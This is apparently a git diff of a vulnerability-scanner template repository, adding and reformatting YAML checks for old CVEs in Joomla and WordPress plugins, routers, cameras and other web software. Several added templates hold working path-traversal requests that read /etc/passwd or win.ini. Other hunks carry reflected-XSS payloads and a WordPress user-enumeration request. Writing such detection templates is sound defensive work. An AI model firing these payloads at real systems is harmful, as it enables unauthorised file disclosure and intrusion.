description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34004
- https://www.cvedetails.com/cve/CVE-2010-2036
tags: cve,cve2010,lfi,joomla
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2122.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2122
info:
name: Joomla! Component simpledownload 0.9.5 - Local File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12623
- https://www.cvedetails.com/cve/CVE-2010-2122
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: | reference:
- https://www.exploit-db.com/exploits/10946 - https://www.exploit-db.com/exploits/10946
- https://www.cvedetails.com/cve/CVE-2010-2259 - https://www.cvedetails.com/cve/CVE-2010-2259
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
reference: | reference:
- https://www.securityfocus.com/bid/40550/info - https://www.securityfocus.com/bid/40550/info
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307 - https://nvd.nist.gov/vuln/detail/CVE-2010-2307
tags: cve,cve2010,iot,lfi tags: cve,cve2010,iot,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: | reference:
- https://www.exploit-db.com/exploits/14017 - https://www.exploit-db.com/exploits/14017
- https://www.cvedetails.com/cve/CVE-2010-2682 - https://www.cvedetails.com/cve/CVE-2010-2682
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi

27
CVE-2010-3426.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-3426
info:
name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/14964
- https://www.cvedetails.com/cve/CVE-2010-3426
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
reference: | reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231 - https://nvd.nist.gov/vuln/detail/CVE-2010-4231
- https://www.exploit-db.com/exploits/15505 - https://www.exploit-db.com/exploits/15505
tags: cve,cve2010,iot,lfi tags: cve,cve2010,iot,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference: | reference:
- https://www.exploit-db.com/exploits/15791 - https://www.exploit-db.com/exploits/15791
- https://www.cvedetails.com/cve/CVE-2010-4617 - https://www.cvedetails.com/cve/CVE-2010-4617
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi

29
CVE-2010-5278.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2010-5278
info:
name: MODx manager - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
reference:
- https://www.exploit-db.com/exploits/34788
- https://www.cvedetails.com/cve/CVE-2010-5278
tags: cve,cve2010,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter.
reference: | reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
- https://www.exploit-db.com/exploits/17119 - https://www.exploit-db.com/exploits/17119
tags: cve,cve2011,wordpress,wp-plugin,lfi tags: cve,cve2011,wordpress,wp-plugin,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: | reference:
- https://www.exploit-db.com/exploits/36598 - https://www.exploit-db.com/exploits/36598
- https://www.cvedetails.com/cve/CVE-2011-4804 - https://www.cvedetails.com/cve/CVE-2011-4804
tags: cve,cve2011,joomla,lfi tags: cve,cve2011,joomla,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
reference: | reference:
- https://www.exploit-db.com/exploits/36650 - https://www.exploit-db.com/exploits/36650
- https://www.cvedetails.com/cve/CVE-2012-0991 - https://www.cvedetails.com/cve/CVE-2012-0991
tags: cve,cve2012,lfi,openemr tags: cve,cve2012,lfi,openemr

View File

@ -12,10 +12,10 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
reference: | reference:
- https://www.exploit-db.com/exploits/37129 - https://www.exploit-db.com/exploits/37129
- https://www.cvedetails.com/cve/CVE-2012-4253 - https://www.cvedetails.com/cve/CVE-2012-4253
tags: cve,cve2012,lfi tags: cve,cve2012,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
reference: | reference:
- https://www.exploit-db.com/exploits/37034 - https://www.exploit-db.com/exploits/37034
- https://www.cvedetails.com/cve/CVE-2012-4878 - https://www.cvedetails.com/cve/CVE-2012-4878
tags: cve,cve2012,lfi tags: cve,cve2012,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
reference: | reference:
- https://www.securityfocus.com/bid/52841/info - https://www.securityfocus.com/bid/52841/info
- https://nvd.nist.gov/vuln/detail/CVE-2012-4889 - https://nvd.nist.gov/vuln/detail/CVE-2012-4889
tags: cve,cve2012,xss,manageengine tags: cve,cve2012,xss,manageengine

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
reference: | reference:
- https://www.exploit-db.com/exploits/26955 - https://www.exploit-db.com/exploits/26955
- https://www.cvedetails.com/cve/CVE-2013-5979 - https://www.cvedetails.com/cve/CVE-2013-5979
- https://bugs.launchpad.net/xibo/+bug/1093967 - https://bugs.launchpad.net/xibo/+bug/1093967

View File

@ -5,9 +5,9 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
reference: | reference:
- https://www.exploit-db.com/exploits/38936 - https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi tags: cve,cve2013,wordpress,wp-plugin,lfi
requests: requests:

View File

@ -4,7 +4,7 @@ info:
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535 - https://nvd.nist.gov/vuln/detail/CVE-2014-4535
tags: cve,cve2014,wordpress,wp-plugin,xss tags: cve,cve2014,wordpress,wp-plugin,xss

View File

@ -4,7 +4,7 @@ info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536 - https://nvd.nist.gov/vuln/detail/CVE-2014-4536
tags: cve,cve2014,wordpress,wp-plugin,xss tags: cve,cve2014,wordpress,wp-plugin,xss

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
reference: | reference:
- https://www.exploit-db.com/exploits/39287 - https://www.exploit-db.com/exploits/39287
- https://www.cvedetails.com/cve/CVE-2014-5368 - https://www.cvedetails.com/cve/CVE-2014-5368
tags: cve,cve2014,wordpress,wp-plugin,lfi tags: cve,cve2014,wordpress,wp-plugin,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
reference: | reference:
- https://www.exploit-db.com/exploits/35346 - https://www.exploit-db.com/exploits/35346
- https://www.cvedetails.com/cve/CVE-2014-8799 - https://www.cvedetails.com/cve/CVE-2014-8799
tags: cve,cve2014,wordpress,wp-plugin,lfi tags: cve,cve2014,wordpress,wp-plugin,lfi

View File

@ -4,7 +4,7 @@ info:
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI) name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
author: daffainfo author: daffainfo
severity: high severity: high
reference: | reference:
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
tags: cve,cve2015,wordpress,wp-plugin,lfi tags: cve,cve2015,wordpress,wp-plugin,lfi

View File

@ -4,7 +4,7 @@ info:
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807 - https://nvd.nist.gov/vuln/detail/CVE-2015-2807
tags: cve,cve2015,wordpress,wp-plugin,xss tags: cve,cve2015,wordpress,wp-plugin,xss

View File

@ -4,7 +4,7 @@ info:
name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095 - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
- https://nvd.nist.gov/vuln/detail/CVE-2015-9414 - https://nvd.nist.gov/vuln/detail/CVE-2015-9414
tags: cve,cve2015,wordpress,wp-plugin,xss tags: cve,cve2015,wordpress,wp-plugin,xss

View File

@ -4,7 +4,7 @@ info:
name: WordPress Plugin RobotCPA 5 - Directory Traversal name: WordPress Plugin RobotCPA 5 - Directory Traversal
author: daffainfo author: daffainfo
severity: high severity: high
reference: | reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
- https://www.exploit-db.com/exploits/37252 - https://www.exploit-db.com/exploits/37252
tags: cve,cve2015,wordpress,wp-plugin,lfi tags: cve,cve2015,wordpress,wp-plugin,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Reflected XSS in wordpress plugin anti-plagiarism v3.60 description: Reflected XSS in wordpress plugin anti-plagiarism v3.60
reference: | reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - http://www.vapidlabs.com/wp/wp_advisory.php?v=161
- https://wordpress.org/plugins/anti-plagiarism - https://wordpress.org/plugins/anti-plagiarism
tags: cve,cve2016,wordpress,xss,wp-plugin tags: cve,cve2016,wordpress,xss,wp-plugin

View File

@ -4,7 +4,7 @@ info:
name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
tags: cve,cve2016,wordpress,wp-plugin,xss tags: cve,cve2016,wordpress,wp-plugin,xss

View File

@ -4,7 +4,7 @@ info:
name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS) name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54 - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
tags: cve,cve2016,wordpress,wp-plugin,xss tags: cve,cve2016,wordpress,wp-plugin,xss

View File

@ -5,7 +5,9 @@ info:
author: daffainfo,0x240x23elu author: daffainfo,0x240x23elu
severity: high severity: high
description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php. description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956 reference:
- https://cxsecurity.com/issue/WLB-2016080220
- https://wpvulndb.com/vulnerabilities/8609
tags: cve,cve2016,wordpress,wp-plugin,lfi tags: cve,cve2016,wordpress,wp-plugin,lfi
requests: requests:

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: critical severity: critical
description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
reference: | reference:
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960

View File

@ -4,7 +4,7 @@ info:
name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS) name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://www.vulnerability-lab.com/get_content.php?id=1808 - https://www.vulnerability-lab.com/get_content.php?id=1808
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993
tags: cve,cve2016,wordpress,wp-theme,xss tags: cve,cve2016,wordpress,wp-theme,xss

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978. description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
reference: | reference:
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
- https://www.cvedetails.com/cve/CVE-2016-2389 - https://www.cvedetails.com/cve/CVE-2016-2389
tags: cve,cve2016,lfi,sap tags: cve,cve2016,lfi,sap

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
reference: | reference:
- https://www.exploit-db.com/exploits/44054 - https://www.exploit-db.com/exploits/44054
- https://www.cvedetails.com/cve/CVE-2017-15647 - https://www.cvedetails.com/cve/CVE-2017-15647
tags: cve,cve2017,lfi,router tags: cve,cve2017,lfi,router

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php. description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
reference: | reference:
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059 - https://nvd.nist.gov/vuln/detail/CVE-2017-17059
tags: cve,cve2017,wordpress,xss,wp-plugin tags: cve,cve2017,wordpress,xss,wp-plugin

View File

@ -6,9 +6,9 @@ info:
severity: info severity: info
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
tags: cve,cve2017,wordpress tags: cve,cve2017,wordpress
reference: | reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487 - https://nvd.nist.gov/vuln/detail/CVE-2017-5487
- https://www.exploit-db.com/exploits/41497 - https://www.exploit-db.com/exploits/41497
requests: requests:
- method: GET - method: GET
@ -16,6 +16,7 @@ requests:
- "{{BaseURL}}/wp-json/wp/v2/users/" - "{{BaseURL}}/wp-json/wp/v2/users/"
- "{{BaseURL}}/?rest_route=/wp/v2/users/" - "{{BaseURL}}/?rest_route=/wp/v2/users/"
stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
@ -33,8 +34,9 @@ requests:
- '"name":' - '"name":'
- '"avatar_urls":' - '"avatar_urls":'
condition: and condition: and
extractors: extractors:
- type: regex - type: regex
part: body part: body
regex: regex:
- '"name":"[^"]*"' - '"name":"[^"]*"'

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
reference: | reference:
- https://www.exploit-db.com/exploits/45678 - https://www.exploit-db.com/exploits/45678
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822 - https://nvd.nist.gov/vuln/detail/CVE-2018-10822
tags: cve,cve2018,lfi,router,dlink tags: cve,cve2018,lfi,router,dlink

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution. description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
reference: | reference:
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031 - https://nvd.nist.gov/vuln/detail/CVE-2018-12031
- https://www.exploit-db.com/exploits/48614 - https://www.exploit-db.com/exploits/48614

19
CVE-2018-15473.yaml Normal file
View File

@ -0,0 +1,19 @@
id: CVE-2018-15473
info:
name: OpenSSH Username Enumeration
author: r3dg33k,daffainfo
severity: low
